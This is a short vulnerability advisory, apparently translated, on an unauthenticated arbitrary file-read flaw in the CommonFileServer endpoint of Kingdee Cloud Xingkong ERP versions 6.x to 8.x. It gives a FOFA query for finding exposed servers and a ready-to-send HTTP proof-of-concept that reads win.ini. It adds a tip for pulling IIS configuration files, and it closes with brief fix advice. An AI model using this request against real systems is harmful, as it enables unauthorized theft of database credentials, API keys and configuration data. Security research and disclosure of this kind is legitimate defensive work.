0x01 Product Introduction
Kingdee Yunxingkong is a cloud-based enterprise resource management (ERP) software that provides enterprises with integrated solutions for financial management, supply chain management, and business process management. Kingdee Cloud Xingkong focuses on large and medium-sized enterprises with multiple organizations and multiple profit centers, and provides an open ERP cloud platform for enterprises in the digital economy era with three characteristics of "openness, standardization and social interaction". The services cover: finance, supply chain, intelligent manufacturing, amoeba management, omni-channel marketing, e-commerce, HR, enterprise Internet services, helping enterprises to realize the new ecology of digital marketing and management restructuring, etc., and enhance the digital capabilities of enterprises.
0x02 Vulnerability Overview
Due to the improper permission setting of Kingdee Cloud Starry CommonFileServer interface, unauthenticated attackers can use this vulnerability to access arbitrary files on the server, including database credentials, API keys, configuration files, etc., to obtain system permissions and sensitive information.
0x03 range of influence
Version 6.x, Version 7.x, Version 8.x (all affected)
0x04 Recurrence environment
FOFA: app="Kingdee Cloud Starry Sky-Management Center"
0x05 Vulnerability Reappearance
PoC
GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
PS: The vulnerability is relatively simple and rude, just splice the file name directly after the /CommonFileServer/ path (special symbol url encoding)
read IIS configuration file
0x06 Repair suggestion
Turn off Internet exposure and set directory permissions
Purify data: Hard-code or uniformly code the file name parameters passed by users, whitelist control file types, and reject parameters containing malicious characters or null characters.